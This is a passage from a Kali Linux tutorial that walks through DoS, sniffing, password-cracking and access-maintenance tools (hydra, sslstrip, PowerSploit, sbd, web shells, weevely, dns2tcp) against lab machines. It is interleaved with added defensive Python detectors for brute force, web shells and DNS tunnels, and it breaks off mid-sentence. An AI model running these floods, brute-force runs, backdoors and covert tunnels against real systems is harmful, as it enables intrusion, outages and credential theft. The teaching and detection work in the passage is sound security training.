          inet addr:192.168.1.102  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe0c:e3be/64 Scope:Link

Slowhttptest
Slowhttptest is one of the DoS attacking tools. It uses the HTTP protocol to connect to
the server and keep its resources, such as CPU and RAM, busy. Let’s see in detail how to
use it and explain its functions.

To open slowhttptest, first open the terminal and type “slowhttptest -parameters”.


You can type “slowhttptest -h” to see all the parameters that you need to use. In case
you receive the output ‘Command not found’, you have to first type “apt-get install
slowhttptest”.

root@kali:~# apt-get install slowhttptest
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 1759 not upgraded.
Need to get 28.5 kB of archives.

Then, after installation, type slowhttptest -h again.

root@kali:~# slowhttptest -h

slowhttptest, a tool to test for slow HTTP DoS vulnerabilities - version 1.6
Usage: slowhttptest [options ...]
Test modes:
  -H               slow headers a.k.a. Slowloris (default)
  -B               slow body a.k.a R-U-Dead-Yet
  -R               range attack a.k.a Apache killer
  -X               slow read a.k.a Slow Read

Reporting options:

  -g               generate statistics with socket state changes (off)
  -o file_prefix   save statistics output in file.html and file.csv (-g required)

Type the following command:

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2

Where,

 (-c 500) = 500 connections
 (-H) = Slowloris mode
 -g = Generate statistics
 -o outputfile = Output file name
 -i 10 = Use 10 seconds to wait for data
 -r 200 = 200 connections with -t GET = GET requests
 -u http://192.168.1.202/index.php = target URL
 -x 24 = maximum length of 24 bytes
 -p 2 = 2-second timeout


Once the test starts, the output will be as shown in the following screenshot, where you
can notice that the service is available.

After a while, at the 287th connection the service goes down. This means that the server
can handle a maximum of 287 concurrent HTTP connections.

Inviteflood
Inviteflood is a SIP/SDP INVITE message flooder over UDP/IP. It runs on a variety of
Linux distributions. It carries out DoS (Denial of Service) attacks against SIP devices by
sending multiple INVITE requests.

To open Inviteflood, first open the terminal and type “inviteflood -parameters”.

For help, you can use “inviteflood -h”.


root@kali:~# inviteflood -h

inviteflood - Version 2.0
              June 09, 2006
Usage:
Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

Next, you can use the following command:

inviteflood eth0 target_extension target_domain target_ip number_of_packets

Where,

 target_extension is 2000
 target_domain is 192.168.x.x
 target_ip is 192.168.x.x
 number_of_packets is 1
 -a is alias of SIP account

Iaxflood
Iaxflood is a VoIP DoS tool. To open it, type “iaxflood sourcename destinationname
numpackets” in the terminal.

To know how to use it, type “iaxflood -h”.

root@kali:~# iaxflood -h

usage: iaxflood sourcename destinationname numpackets


thc-ssl-dos
THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL
connection requires 15x more processing power on the server than on the client. THC-
SSL-DOS exploits this asymmetric property by overloading the server and knocking it off
the Internet.

Following is the command:

thc-ssl-dos victimIP httpsport --accept

In this example, it will be:

thc-ssl-dos 192.168.1.1 443 --accept

10. Kali Linux ─ Sniffing & Spoofing

The basic concept of sniffing tools is as simple as wiretapping and Kali Linux has some
popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing
tools available in Kali.

Burpsuite
Burpsuite can be used as a sniffing tool between your browser and the webservers to find
the parameters that the web application uses.

To open Burpsuite, go to Applications -> Web Application Analysis -> burpsuite.

To set up the sniffing, we configure burpsuite to behave as a proxy. To do this, go to
Options as shown in the following screenshot. Check the box as shown.

In this case, the proxy IP will be 127.0.0.1 with port 8080.

[Screenshot: Burp Suite Free Edition v1.6.31, Proxy -> Options -> Proxy Listeners, with the
listener on 127.0.0.1:8080 checked as running.]
Then configure the browser proxy which is the IP of burpsuite machine and the port.

[Screenshot: Firefox Connection Settings -> Manual proxy configuration: HTTP Proxy
127.0.0.1, Port 8080, "Use this proxy server for all protocols" checked; No Proxy for:
localhost, 127.0.0.1.]

To start interception, go to Proxy -> Intercept -> click “Intercept is on”.

Continue to navigate on the webpage that you want to find the parameter to test for
vulnerabilities.


In this case, it is the Metasploitable machine with IP 192.168.1.102.


[Screenshot: Damn Vulnerable Web App (DVWA) - Login page, opened in Iceweasel at
192.168.1.102.]
Go to “HTTP History”. In the following screenshot, the line marked with a red arrow shows the
last request. In the Raw view, the hidden parameters such as the Session ID and the other
parameters such as the user name and password have been underlined in red.

[Screenshot: Burp HTTP history - Raw view of the POST login request to Host 192.168.1.102,
with the Cookie header (security=high; PHPSESSID=...) and the username/password form
parameters underlined in red.]

mitmproxy
mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console
interface that allows traffic flows to be inspected and edited on the fly.

To open it, go to the terminal and type “mitmproxy -parameter”; for getting help on
commands, type “mitmproxy -h”.


To start the mitmproxy, type “mitmproxy -p portnumber”. In this case, it is “mitmproxy -p 80”.

root@kali:~# mitmproxy -p 80

Wireshark
Wireshark is one of the best data packet analyzers. It analyzes deeply the packets in frame
level. You can get more information on Wireshark from their official webpage:
https://www.wireshark.org/. In Kali, it is found using the following path - Applications ->
Sniffing & Spoofing -> wireshark.


Once you click wireshark, the following GUI opens up.

[Screenshot: The Wireshark Network Analyzer (Wireshark 1.12.6) start page - Capture:
Interface List, Start, Capture Options; Files: Open, Open Recent, Sample Captures.]

Click “Start” and the packet capturing will start as shown in the following screenshot.
[Screenshot: Wireshark live capture in progress - packet list pane (No., Time, Source,
Destination, Protocol, Length, Info; UDP and ARP packets from 192.168.1.x), packet
details pane (Frame, Ethernet II, Address Resolution Protocol) and packet bytes pane.]

sslstrip
sslstrip is a MITM attack that forces a victim's browser to communicate in plain text over
HTTP while the proxy rewrites the content coming from the HTTPS server. To do this, sslstrip
"strips" https:// URLs and turns them into http:// URLs.

To open it, go to Applications -> 09-Sniffing & Spoofing -> Spoofing and MITM -> sslstrip.

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

root@kali:~#

To set it up, add a rule that redirects all port 80 traffic to port 8080, the port on
which sslstrip will listen.

Then, start the sslstrip command for the port needed.

11. Kali Linux ─ Password Cracking Tools

In this chapter, we will learn about the important password cracking tools used in
Kali Linux.

Hydra
Hydra is a login cracker that supports many protocols to attack (Cisco AAA, Cisco auth,
Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET,
HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle
Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh,
SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY,
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP).

To open it, go to Applications -> Password Attacks -> Online Attacks -> hydra.


It will open the terminal console, as shown in the following screenshot.

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
root@kali:~#

In this case, we will brute force the FTP service of the Metasploitable machine, which has IP
192.168.1.101.

eth0      Link encap:Ethernet  HWaddr 08:00:27:0c:c3:6e
          inet addr:192.168.1.101  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe0c:c36e/64 Scope:Link

We have created in Kali a word list with the extension ‘lst’ in the path
/usr/share/wordlists/metasploit.

[Screenshot: file browser showing the word lists in /usr/share/wordlists/metasploit.]

The command will be as follows:

hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

where -V prints each username and password combination as it is tried.


As shown in the following screenshot, the username and password are found which are
msfadmin:msfadmin
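From the defender's side, the run above leaves a tight burst of FAIL LOGIN lines in the target's FTP log (assumed here to be vsftpd's /var/log/vsftpd.log, the daemon on Metasploitable). The following detector is an added example, not part of the tutorial: it parses such lines, flags any client with a threshold number of failures inside a sliding time window, and reports which accounts later logged in successfully from that client. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of vsftpd log lines (example data, not from the tutorial):
# a burst of failed logins from one client followed by a success, plus a
# normal user who mistyped a password once from another address.
SAMPLE_LOG = """\
Mon Mar  7 10:00:01 2016 [pid 2211] [msfadmin] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  7 10:00:01 2016 [pid 2213] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  7 10:00:02 2016 [pid 2215] [root] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  7 10:00:02 2016 [pid 2217] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  7 10:00:03 2016 [pid 2219] [msfadmin] FAIL LOGIN: Client "192.168.1.50"
Mon Mar  7 10:00:03 2016 [pid 2221] [msfadmin] OK LOGIN: Client "192.168.1.50"
Mon Mar  7 10:05:00 2016 [pid 2300] [alice] FAIL LOGIN: Client "192.168.1.77"
Mon Mar  7 10:05:09 2016 [pid 2302] [alice] OK LOGIN: Client "192.168.1.77"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line):
    """Return (timestamp, user, 'OK'|'FAIL', client_ip) or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {client_ip: (max failures within one window, [users that later
    logged in OK from that client])} for clients that reach the threshold."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    fails = defaultdict(list)
    successes = defaultdict(set)
    for ts, user, result, ip in events:
        if result == "FAIL":
            fails[ip].append(ts)
        else:
            successes[ip].add((ts, user))

    findings = {}
    for ip, times in fails.items():
        times.sort()
        # Sliding window: the densest run of failures decides, so a slow
        # trickle of typos over a day does not trip the detector.
        best, j = 0, 0
        for i, t in enumerate(times):
            while times[j] < t - window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            first_fail = times[0]
            # A success after the burst from the same client is the real alarm:
            # the guessed account is now in use.
            guessed = sorted({u for ts, u in successes[ip] if ts >= first_fail})
            findings[ip] = (best, guessed)
    return findings


if __name__ == "__main__":
    for ip, (count, users) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures in window; accounts logged in after: {users}")
```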

Johnny
Johnny is a GUI for the John the Ripper password cracking tool. Generally, it is used for
weak passwords.

To open it, go to Applications -> Password Attacks -> johnny.


In this case, we will get the password of Kali machine with the following command and a
file will be created on the desktop.

Click “Open Passwd File” -> OK and all the files will be shown as in the following
screenshot.

File  Attack  Passwords
[Open Passwd File]  [Start Attack]
Left panel: Passwords, Options, Statistics, Settings, Output

     User      Password  Hash  GECOS
  1  root      x               0:0:root:/root:/bin/bash
  2  daemon    x               1:1:daemon:/usr/sbin:/bin/sh
  3  bin       x               2:2:bin:/bin:/bin/sh
  4  sys       x               3:3:sys:/dev:/bin/sh
  5  sync      x               4:65534:sync:/bin:/bin/sync
  6  games     x               5:60:games:/usr/games:/bin/sh
  7  man       x               6:12:man:/var/cache/man:/bin/sh
  8  lp        x               7:7:lp:/var/spool/lpd:/bin/sh
  9  mail      x               8:8:mail:/var/mail:/bin/sh
 10  news      x               9:9:news:/var/spool/news:/bin/sh
 11  uucp      x               10:10:uucp:/var/spool/uucp:/bin/sh
 12  proxy     x               13:13:proxy:/bin:/bin/sh
 13  www-data  x               33:33:www-data:/var/www:/bin/sh
 14  backup    x               34:34:backup:/var/backups:/bin/sh
 15  list      x               38:38:Mailing List Manager:/var/list:/bin/sh
 16  irc       x               39:39:ircd:/var/run/ircd:/bin/sh

Click “Start Attack”.

Johnny
File  Attack  Passwords
[Open Passwd File]  [Start Attack]  [Copy]

     User      Password  Hash  GECOS
 37  postgres  x               118:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
After the attack is complete, click the left panel at “Passwords” and the password will be
unshaded.

Johnny
File  Attack  Passwords
[Open Passwd File]  [Start Attack]  [Copy]

     User      Password  Hash  GECOS
     postgres  x               118:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
     redsocks  x               119:130::/var/run/redsocks:/bin/false
     stunnel4  x               120:131::/var/run/stunnel4:/bin/false
     statd     x               121:65534::/var/lib/nfs:/bin/false
     sshd      x               122:134::/nonexistent:/bin/false
     ...       x               123:135:Gnome Display Manager:/var/lib/gdm3:/bin/false
     ...       x               124:116:RealtimeKit,,,:/proc:/bin/false
     ...                       125:137::/home/saned:/bin/false
     ...                       16333:0:99999:7:::
     ...                       16216:0:99999:7:::
 47  bin                       16216:0:99999:7:::
 48  sys                       16216:0:99999:7:::
 49  sync                      16216:0:99999:7:::
 50  games                     16216:0:99999:7:::
 51  man                       16216:0:99999:7:::
                               16216:0:99999:7:::

john
john is the command-line version of the Johnny GUI. To start it, open the Terminal and
type “john”.

root@kali:~# john
John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-64-avx]
Copyright (c) 1996-2015 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION]         "single crack" mode
--wordlist[=FILE] --stdin  wordlist mode, read words from FILE or stdin
                  --pipe   like --stdin, but bulk reads, and allows rules
--loopback[=FILE]          like --wordlist, but fetch words from a .pot file
--dupe-suppression         suppress all dupes in wordlist (and force preload)
--prince[=FILE]            PRINCE mode, read words from FILE
--encoding=NAME            input encoding (eg. UTF-8, ISO-8859-1). See also
                           doc/ENCODING and --list=hidden-options.
--rules[=SECTION]          enable word mangling rules for wordlist modes
--incremental[=MODE]       "incremental" mode [using section MODE]
--mask=MASK                mask mode using MASK
--markov[=OPTIONS]         "Markov" mode (see doc/MARKOV)
--external=MODE            external mode or word filter
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]

To unshadow the password file, we need to write the following command:

root@kali:~# unshadow passwd shadow > unshadowed.txt


Rainbowcrack
The RainbowCrack software cracks hashes by rainbow table lookup. Rainbow tables are
ordinary files stored on the hard disk. Generally, Rainbow tables are bought online or can
be compiled with different tools.

To open it, go to Applications -> Password Attacks -> click “rainbowcrack”.

The command to crack a hash password is:

rcrack path_to_rainbow_tables -f path_to_password_hash

SQLdict
It is a dictionary attack tool for SQL server and is very easy and basic to be used. To open
it, open the terminal and type “sqldict”. It will open the following view.


SQLdict 2.1 - The SQL Server Dictionary Attacker
copyright (c) 2000, Arne Vidstrom
arne.vidstrom@ntsecurity.nu - http://ntsecurity.nu

Target server IP: [          ]
Target account:   [          ]
[Load Password File]
[Start]  [Stop]

Under “Target server IP”, enter the IP of the server holding the SQL. Under “Target
account”, enter the username. Then load the file with the passwords and click “Start” until
it finishes.

hash-identifier
It is a tool that is used to identify types of hashes, meaning what they are being used for.
For example, if I have a HASH, it can tell me if it is a Linux or windows HASH.

HASH: 098f6bcd4621d373cade4e832627b4f6

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128

The above screen shows that it can be a MD5 hash and it seems a Domain cached
credential.
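hash-identifier can only offer a candidate list for a bare 32-character hex digest, because every 128-bit digest looks the same; it is the format around the digest (a $6$ prefix, an LM:NT pair) that pins down a Linux or Windows origin. The following classifier is an added example that is not part of the tutorial or of hash-identifier: it recognises those formats first, falls back to candidates by digest length, and shows how a known plaintext settles the ambiguity for the hash from the screenshot. The candidate tables are this example's own assumptions.

```python
import hashlib
import re

# Candidate algorithms by hex-digest length (example's own table): all 128-bit
# digests look alike, which is why hash-identifier listed several for the hash above.
HEX_CANDIDATES = {
    32: ["MD5", "Domain Cached Credentials", "NTLM", "MD4", "MD2",
         "Haval-128", "RipeMD-128"],
    40: ["SHA-1", "RipeMD-160"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "SHA3-512", "Whirlpool"],
}

# Modular-crypt prefixes used in /etc/shadow (and by Apache) name the algorithm
# unambiguously, so a Linux hash is recognised before any length-based guessing.
CRYPT_PREFIXES = [
    ("$1$", "MD5-crypt (Linux /etc/shadow)"),
    ("$5$", "SHA-256-crypt (Linux /etc/shadow)"),
    ("$6$", "SHA-512-crypt (Linux /etc/shadow)"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$y$", "yescrypt (Linux /etc/shadow)"),
    ("$apr1$", "Apache APR1 MD5"),
]


def identify(h):
    """Return candidate algorithm names for one hash string, most likely first."""
    h = h.strip()
    for prefix, name in CRYPT_PREFIXES:
        if h.startswith(prefix):
            return [name]
    if re.fullmatch(r"\*[0-9A-F]{40}", h):
        return ["MySQL 4.1+ (SHA1(SHA1(pass)))"]
    if re.fullmatch(r"[0-9a-fA-F]{32}:[0-9a-fA-F]{32}", h):
        # lmhash:nthash is the layout of a Windows SAM dump line.
        return ["LM:NTLM pair (Windows SAM dump)"]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(HEX_CANDIDATES.get(len(h), []))
    return []


def which_algorithm(h, known_plaintext):
    """Settle the ambiguity when the plaintext is already known (a vendor default,
    a test value): return the hashlib algorithm that reproduces the digest, or None."""
    h = h.strip().lower()
    for name in ("md5", "sha1", "sha256", "sha512"):
        if hashlib.new(name, known_plaintext.encode()).hexdigest() == h:
            return name
    return None


if __name__ == "__main__":
    sample = "098f6bcd4621d373cade4e832627b4f6"   # the hash from the screenshot
    print(identify(sample))
    print(which_algorithm(sample, "test"))        # the well-known MD5 of "test"
```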

12. Kali Linux ─ Maintaining Access

In this chapter, we will see the tools that Kali uses to maintain a connection to, and access
to, a hacked machine even when it disconnects and connects again.

Powersploit
This is a tool for Windows machines; it needs PowerShell installed on the victim's machine.
This tool helps the hacker to connect with the victim’s machine via PowerShell.

To open it, open the terminal on the left and type the following command to enter into the
powersploit folder:

cd /usr/share/powersploit/

If you type “ls”, it will list all the powersploit tools that you can download and install on the
victim’s machine after you have gained access. Most of them are self-explanatory from
their names.

root@kali:~# cd /usr/share/powersploit/
root@kali:/usr/share/powersploit# ls
AntivirusBypass  Exfiltration  PETools           PowerSploit.psm1  Recon               ScriptModification
CodeExecution    Persistence   PowerSploit.psd1  README.md         ReverseEngineering

An easy way to download this tool onto the victim’s machine is to create a web server,
which can be done easily from the powersploit folder using the following command:

python -m SimpleHTTPServer

root@kali:/usr/share/powersploit# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

After this, if you type: http://<Kali machine ip_address>:8000/ following is the result.

Directory listing for /

  - AntivirusBypass/
  - CodeExecution/
  - Exfiltration/
  - Persistence/
  - PETools/
  - PowerSploit.psd1
  - PowerSploit.psm1
  - README.md
  - Recon/
  - ReverseEngineering/
  - ScriptModification/

Sbd
sbd is a tool similar to Netcat. It is portable and can be used in Linux and Microsoft
machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption. Basically, it helps to
connect to a victim’s machine at any time on a specific port and send commands remotely.

To open it, go to the terminal and type “sbd -l -p port” for the server to accept
connections.

In this case, let us put port 44 where the server will listen.

root@kali:~# sbd -l -p 44 -v
listening on port 44

On the victim’s site, type “sbd IPofserver port”. A connection will be established where
we can send the remote commands.

In this case, it is “localhost” since we have performed the test on the same machine.
root@kali:~# sbd localhost 44

Finally, on the server you will see that a connection has occurred as shown in the following
screenshot.

connect to 127.0.0.1:44 from 127.0.0.1:57252 (localhost)


Webshells
Webshells can be used to maintain access to, or to compromise, a website. Most of them, however,
are detected by antivirus products. The C99 PHP shell, for example, is so well known that any
common antivirus will flag it as malware.

Generally, their main function is to run system commands through a web interface.

To open them, type “cd /usr/share/webshells/” in the terminal.

root@kali:/usr/share/webshells# ls
asp  aspx  cfm  jsp  perl  php
root@kali:/usr/share/webshells#

As you can see, they are divided into classes according to the programming language: asp, aspx,
cfm, jsp, perl, php.

If you enter the php folder, you can see all the webshells for PHP web pages.

root@kali:/usr/share/webshells# cd php/
root@kali:/usr/share/webshells/php# ls
findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
php-backdoor.php  php-reverse-shell.php   simple-backdoor.php

After uploading a shell such as “simple-backdoor.php” to a web server, open the URL of the web
shell in a browser.

At the end of the URL, add the cmd command. You will see its output as shown in the following
screenshot.

[Screenshot: browser output of the command run through the web shell, listing Host Name, OS Name, OS Version, OS Manufacturer, OS Configuration: Standalone Workstation, OS Build Type: Multiprocessor Free, Registered Owner and Registered Organization]
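Since the shells above all work by passing a request parameter into a system-command or code-execution function, the same pattern is what a defender looks for when auditing a web root. The following scanner is an added example written for this page, not code from Kali or from the webshells package: it treats PHP source text as input, marks variables assigned from request superglobals as attacker-controlled, and reports any dangerous sink that receives request input, a tainted variable, or a decoded payload. The sample files are constructed for the demonstration, and the regular expressions are a deliberately simple approximation of PHP syntax.

```python
import re

# Shell-command and code-execution sinks that a web shell typically calls
DANGEROUS_SINKS = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "eval", "assert")
# Functions commonly used to hide a payload from plain signature matching
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13")

SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b")
# "$var = $_GET[...]" style assignments mark $var as attacker-controlled
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*\(?\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")
# A call to one of the sinks; the argument text runs up to the closing parenthesis
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_SINKS) + r")\s*\(([^;]*)\)",
                     re.IGNORECASE)

# Constructed sample files (not the shells shipped in /usr/share/webshells)
SAMPLE_FILES = {
    "upload.php": "<?php $c = $_REQUEST['cmd']; echo '<pre>'; system($c); echo '</pre>'; ?>",
    "img.php": "<?php eval(base64_decode($_POST['p'])); ?>",
    "contact.php": "<?php $name = htmlspecialchars($_POST['name']); "
                   "mail('ops@example.com', 'Contact', $name); ?>",
    "stats.php": "<?php $uptime = shell_exec('uptime'); echo $uptime; ?>",
}


def scan_php(source):
    """Return a list of (sink, reason) findings for one PHP source string."""
    tainted = {m.group(1) for m in ASSIGN_RE.finditer(source)}
    findings = []
    for m in CALL_RE.finditer(source):
        sink, arg = m.group(1).lower(), m.group(2)
        reasons = []
        if SUPERGLOBAL_RE.search(arg):
            reasons.append("request input passed straight to a sink")
        if any(re.search(re.escape(v) + r"\b", arg) for v in tainted):
            reasons.append("variable assigned from request input reaches a sink")
        if any(d in arg for d in DECODERS):
            reasons.append("decoded/obfuscated payload is executed")
        if reasons:
            findings.append((sink, "; ".join(reasons)))
    return findings


def scan_files(files):
    """files: {name: php_source}. Returns {name: findings} for flagged files only."""
    flagged = {}
    for name, source in files.items():
        findings = scan_php(source)
        if findings:
            flagged[name] = findings
    return flagged


if __name__ == "__main__":
    for name, findings in scan_files(SAMPLE_FILES).items():
        for sink, reason in findings:
            print(f"{name}: {sink}() -> {reason}")
```

Note that stats.php calls shell_exec() with a literal argument and is not reported: the scanner flags the flow of request data into a sink, not the mere presence of the function, which keeps the false-positive rate usable on real applications.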

Weevely
Weevely is a PHP web shell that simulates a telnet-like connection. It is a tool for web
application post-exploitation, and can be used as a stealth backdoor or as a web shell to
manage legitimate web accounts, even free hosted ones.

To open it, go to the terminal and type “weevely” where you can see its usage.


To generate the shell, type “weevely generate password pathoffile”. As seen in the
following screenshot, it is generated in the “Desktop” folder; the file is then uploaded to a
web server to gain access.

After uploading the web shell as shown in the following screenshot, we can connect to the
server using the command “weevely URL password”, after which you can see that a session has
started.


http-tunnel
http-tunnel creates a bidirectional virtual data stream tunneled in HTTP requests. The
requests can be sent via an HTTP proxy if desired. This can be useful for users behind
restrictive firewalls. If WWW access is allowed through an HTTP proxy, it is possible to use
http-tunnel together with telnet or PPP to connect to a computer outside the firewall.

First, we should create a tunnel server with the following command:

httptunnel_server -h

Then, on the client side, type “httptunnel_client -h” and both will start to accept
connections.

dns2tcp
This is again a tunneling tool; it passes TCP traffic through DNS traffic, which means UDP
port 53.

To start it, type “dns2tcpd”. The usage is printed when you run it.

root@kali:~# dns2tcpd
Usage: dns2tcpd [ -i IP ] [ -F ] [ -d debug_level ] [ -f config_file ] [ -P pid_file ]

On the server side, enter these commands to create the configuration file.

# cat >>.dns2tcpdrc <<END
listen = 0.0.0.0
port = 53
user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain
key = secretkey
resources = ssh:127.0.0.1:22
END
# dns2tcpd -f .dns2tcpdrc

On the client side, enter these commands.

# cat >>.dns2tcprc <<END
domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076

Tunneling starts with the last command.
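Because dns2tcp carries a TCP stream inside DNS queries, the traffic leaves a characteristic trace on the resolver: many distinct, long, high-entropy labels under a single zone, and a skew toward record types such as TXT that can return data in the answer. The following detector is an added example for this page, not part of dns2tcp or Kali: it groups a constructed query log by parent zone, computes label length, Shannon entropy, uniqueness and TXT share, and flags zones that exceed assumed thresholds. The log format (client, query type, query name) and the threshold values are assumptions for the demonstration and should be tuned against a baseline of normal traffic.

```python
import math
from collections import defaultdict

# Constructed resolver log: "<client> <qtype> <qname>" per line (sample data only;
# tunnel.example.net is a made-up zone, and the labels are made-up hex chunks)
SAMPLE_QUERIES = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA www.example.com
10.0.0.5 A mail.example.com
10.0.0.7 TXT 7a3f9c1e2b8d4f60a1c3e5b7d9f1a3c5.t.tunnel.example.net
10.0.0.7 TXT 0b9e8d7c6f5a4e3d2c1b0a9f8e7d6c5b.t.tunnel.example.net
10.0.0.7 TXT c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9.t.tunnel.example.net
10.0.0.7 TXT 1f2e3d4c5b6a79880716253443526170.t.tunnel.example.net
10.0.0.7 TXT 9a8b7c6d5e4f30211f2e3d4c5b6a7988.t.tunnel.example.net
10.0.0.7 TXT 5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b.t.tunnel.example.net
10.0.0.9 A cdn.example.org
"""


def shannon_entropy(s):
    """Bits per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_queries(log_text):
    """Yield (client, qtype, qname) tuples from the constructed log format."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1].upper(), parts[2].rstrip(".").lower()


def analyze(log_text, min_len=20, min_entropy=3.0, min_unique=0.8):
    """Per-zone statistics; 'suspicious' is set when all assumed thresholds are met."""
    per_zone = defaultdict(list)
    for _client, qtype, qname in parse_queries(log_text):
        # Simplification: the zone is everything after the first label
        first, _, zone = qname.partition(".")
        if zone:
            per_zone[zone].append((first, qtype))
    report = {}
    for zone, items in per_zone.items():
        labels = [first for first, _ in items]
        n = len(items)
        stats = {
            "queries": n,
            "unique_ratio": len(set(labels)) / n,
            "mean_len": sum(map(len, labels)) / n,
            "mean_entropy": sum(map(shannon_entropy, labels)) / n,
            "txt_fraction": sum(1 for _, t in items if t == "TXT") / n,
        }
        stats["suspicious"] = (stats["mean_len"] >= min_len
                               and stats["mean_entropy"] >= min_entropy
                               and stats["unique_ratio"] >= min_unique)
        report[zone] = stats
    return report


def suspicious_zones(log_text):
    """Sorted list of zones whose query pattern looks like a data channel."""
    return sorted(z for z, s in analyze(log_text).items() if s["suspicious"])


if __name__ == "__main__":
    for zone, s in analyze(SAMPLE_QUERIES).items():
        flag = "SUSPICIOUS" if s["suspicious"] else "ok"
        print(f"{zone:24} n={s['queries']} len={s['mean_len']:.1f} "
              f"H={s['mean_entropy']:.2f} txt={s['txt_fraction']:.2f} {flag}")
```

The three thresholds are combined with AND on purpose: CDNs and anti-spam services also produce long or unique labels, but rarely all three properties at once, and the TXT share is reported rather than used as a hard rule because dns2tcp's record type is configurable.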


cryptcat
It is another tool like Netcat; it allows making TCP and UDP connections to a victim’s
machine in an encrypted way.

To start a server to listen for a connection, type the following command:

